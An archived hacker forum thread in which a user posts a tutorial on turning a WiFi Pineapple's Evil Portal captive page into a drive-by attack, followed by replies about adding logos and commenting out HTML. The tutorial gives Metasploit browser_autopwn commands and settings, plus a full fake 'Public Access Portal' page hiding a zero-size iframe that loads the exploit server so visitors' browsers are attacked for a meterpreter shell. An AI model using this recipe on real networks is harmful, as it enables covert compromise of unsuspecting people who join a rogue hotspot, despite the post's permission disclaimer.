Jump to content

Archived

This topic is now archived and is closed to further replies.

newbi3

Practical Use for Evil Portal in a pentest

Recommended Posts

Running a captive portal is a very useful thing on the pineapple and since everyone has to view it I thought why not use it to run an attack and get a shell? So here is a quick tutorial on using evil portal to deliver a meterpreter shell.

You will need a pineapple running v3.x of the firmware with evil portal installed on it as well as metasploit and a machine to test this on.

Before we get started here I'd like to remind you to check the laws where you live this could be illegal and also I am not responsible for your actions you and only you are. Please only do this in an environment that you have permission to do so in!

Ok so first this is first lets start up metasploit and use browser autopwn by running the following commands:

root@box:~# msfconsole
msf > use auxiliary/server/browser_autopwn

Now that that is done lets go ahead and take a look at the options

msf auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

We need to set LHOST and SRVHOST to the address of our machine ON THE PINEAPPLE NETWORK. In my case it is 172.16.42.42 and if you ran the wp4.sh script yours should be too. Also just for less confusion set SRVPORT to 80 and URIPATH to /

msf auxiliary(browser_autopwn) > set LHOST 172.16.42.1
LHOST => 172.16.42.1
msf auxiliary(browser_autopwn) > set SRVPORT 172.16.42.1
SRVPORT => 172.16.42.1
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
 

Ok now go ahead and run it with the "run" command. This will take a minute to start up fully.

Once that has finished starting up we need to create an iframe to it in our captive portal. Under the "Edit Splash" tab in Evil Portal go ahead and add this line somewhere in the body and then save the file:

<iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe>

This creates the iframe to the server running browser autopwn which will be doing our dirty work for us.

After you saved the changes open up a browser on your test machine (that is connected to the pineapple network) and visit any webpage and you should get stopped by the captive portal! Check over in your metasploit console to see if you got any sessions, I am not going to hold your hand for this part because this is not a tutorial on how to use meterpreter.

I hope this works for you and if you do anything cool post it here I'd love to see what the community does! Remember hack responsibly!

Here is a quick video I made showing this in action:

If you are wanting to use my code for the captive portal here it is:

<html>
<head>
  <title>Public Access Portal</title>
  <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
  <script type="text/javascript">
  var delay = 2; // length of delay in seconds
  var count = 0;

  var Texts=new Array();
  Texts[0]='<p style="font-size:10px;"><u>Terms Of Service</u></p><p style="font-size:10px;">You agree that Public Access is not respondsible for your actions on the internet or on this network.<br/>You agree that all of your communications will be monitored and recorded by Public Access</p>';
  Texts[1]='<a href="$authtarget"><img src="$imagesdir/enter.png" width="71" height="49" border="0"alt="Click to enter" title="Click to enter"> </a>';

  function changeText(){
    document.getElementById('textRange').innerHTML=Texts[count];
    count++;
    if(count==Texts.length){
      window.clearTimeout (to);
      count=0;
    } else {
      var to = setTimeout("changeText()",delay*10000);
    }
  }
  </script>
</head>
<body bgcolor="#DDDDDD" text="#000000" onload="changeText();">
<table border="0" cellpadding="2" cellspacing="0" width="100%"></applet>
<tr>
  <td align=center>
  <!--<h2>Public Access</h2>
  <h10><b><u>Providing fast wireless access to the masses.</u></b></h10>-->
  </td>
</tr>
<tr>
  <td align=center>
  <br/><br/><br/>
  <h1>You're almost there!</h1>
  <p>BY CONNECTING TO THE NETWORK YOU AGREE TO OUR TERMS OF SERVICE.</p>
  </td>
</tr>
<tr>
  <td align=center height="120">
    <!--
         A client is authenticated by requesting the page $authtarget.
         So, href to it here, with an img or link text the user can click on.
	 Also, note that any images you reference must reside in the
	 subdirectory that is the value of $imagesdir (default: "images").
    -->
    <div id="textRange"></div>
  </td>
</tr>
</table>
<iframe src="http://172.16.42.42/" height="0px" width="0px" seamless></iframe>
</body>
</html>

Share this post


Link to post
Share on other sites

Thanks for your code! Now I need to figure out how to incorporate some logo pics.

Share this post


Link to post
Share on other sites

Very simple, you can either put them in /etc/nodogsplash/images/ or in /www and reference it like <img src="172.16.42.1:8080/mylogo.png"/>

Share this post


Link to post
Share on other sites

Ok, I'll give that a shot... Do they need to be .png format? And how would I safely comment out the iframe hook line? I don't want to delete it but using the ## option before the line just gave me two pound symbols in my splash screen.

Share this post


Link to post
Share on other sites

If its in the PHP Code, use //, if its in HTML , add a <!-- infront of the code and a --> at the end of the code

Share this post


Link to post
Share on other sites

I haven't researched it to much yet but I am pretty sure the nodogsplash web server doesn't support PHP so you will only be writting HTML, CSS, and javascript.

Share this post


Link to post
Share on other sites

Thanks to both of you. It looked like HTML but I am not a code monkey. :)

Share this post


Link to post
Share on other sites

Can you post a link to the video, for some reason it no longer appears for me inline..

Share this post


Link to post
Share on other sites

Bobh

You can find it on newbi3 youtube channel, the link is his post signiture.

but the link to the video covering this post topic is at http://www.youtube.com/watch?v=gOQoOCinGKQ

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...